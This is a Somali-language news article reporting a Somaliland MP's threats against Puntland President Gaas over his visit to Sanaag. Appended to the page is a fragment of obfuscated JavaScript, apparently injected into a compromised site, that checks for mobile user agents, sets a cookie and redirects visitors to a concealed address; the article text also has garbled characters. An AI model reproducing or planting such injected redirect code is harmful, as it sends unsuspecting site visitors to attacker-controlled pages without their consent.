Iyadoo Madaxweynaha Maamulka Puntland Dr. C/weli Maxa��ed Cali Gaas Oo Safar Ku Marayo Qaybo ka Mid Ah Gobolka Sanaag ayaa Safarka Gaas Waxaa Si Kulul uga Hadlay Xubno Ka Tirsan Golaha Wakiilada Soomaaliland.
Xildhibaan Axmed Maxa��ed Diiriye Nac nac Oo Ka Mid Ah Golaha Wakiilada Soomaaliland isla-markaana Wareysi Siinayey Idaacadda Codka Gobollada Dhexe Ee Cadaado ayaa Waxa Uu Tilmaamay In Madaxweyne Gaas Ku qaldan Yahay Safarka Uu hadda Ku Maro deegaano ka Tirsan Gobolka Sanaag.
Xildhibaan Nac Nac Waxa Uu Tilmaamay In Mar Hore Soomaaliland Ay Tallaabo ka Qaadi laheyd Balse hadda Ay Ku Dhaafeyso Wax U Qabashada Shacabka Sida Uu Sheegay Xildhibaan Nac Nac
Xildhibaan Axmed Maxa��ed Diiriye Oo hadalkiisa Sii Wata Ayaa Dhinaca kale waxa Uu hoosta Ka Xariiqay In Gaas Ay Tallaabo Ka Qaadi doonaan Isla-markaana isaga Oo Jeebeysan Ay ka Deji Doonaa Hargeysa Waa haddii Uu Dib Ugu Soo Laabto Gobolka Sanaag Sida Uu hadalka U Dhigaya��
Waxa Uu sheegay In Soomaaliland aysan Ugu Tageynin garoowe Iyo dhulka Puntland balse Ay Tallaabo adag ka Qaadeyso Haddii uusan Madaxweyne Gaas Joojin Safarrada Sharci Darrada Oo Uu ku Marayo Deegaano ka Tirsan Gobolka Sanaaga��
Hoos Ka Dhageyso Wareysiga Xildhibaan Nac-Nac Oo dhameystiran:-
A�
attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

